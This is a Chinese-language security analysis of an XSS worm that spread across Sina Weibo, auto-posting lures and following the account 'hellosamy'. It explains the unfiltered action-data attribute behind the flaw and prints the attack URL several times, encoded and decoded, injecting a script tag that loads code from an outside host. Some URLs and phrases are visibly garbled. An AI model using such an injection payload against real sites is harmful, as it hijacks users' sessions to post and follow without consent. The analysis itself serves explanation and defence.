新浪微博”中毒”分析报告

事件的经过

新浪微博28日晚出现大范围”中毒”现象，大量用户自动发送”建大业中穿帮的地方”，”个税起征点有望提到4000”，”郭美美事件的一些未注意到的细节”等带链接的微博与私信，并自动关注一位名为hellosamy的用户。

此前，利用XSS漏洞传播蠕虫的案列在社交网站中曾多次发生，Facebook，Twitter，以及QQ空间，百度空间等都出现过类似的情况，此次新浪微博”中毒”，立刻引起了Nevel公司安全团队的重视。新浪官方早在时间就检测到该病毒，并对漏洞进行了修补，病毒的存活时间不到半个小时，其实XSS中毒现象也并不想传统意义上的中毒，仅仅存活在服务器上，它基本不会对用户电脑造成什么威胁，但会利用用户在新浪微博上的会话权限进行发布微博、关注等操作，同时该漏洞也无法获取到用户的密码信息，用户不需要有太多的担忧。

分析报告：

下面我们来一起分析下该漏洞的成因：从PAYLOAD上来看，实际上属于一个反射弧性的XSS攻击，

http://weibo.com/pub/star/g/xyyyd%22%3E%3Cscript%20src=//www.2kt网站站点" rel="nofollow" /> ?type=update

URlDecode：

http://weibo.com/pub/star/g/xyyyd“><script src=//www.2kt网站站点" rel="nofollow" />

发布完成后我们查看下网页源代码，如下图：

很显然真实的地址会被写入到action-data的属性中去，因此不难想象漏洞产生原因，由于action-data的值没有进行适的过滤，导致攻击者可以输入畸形的数据插入JS脚本，闭前面的双引号和尖括号，从而造成XSS攻击。

构造Xss_Exploit如下：

http://weibo.com/pub/star/g/xyyyd”><script src=//www.2kt网站站点" rel="nofollow" />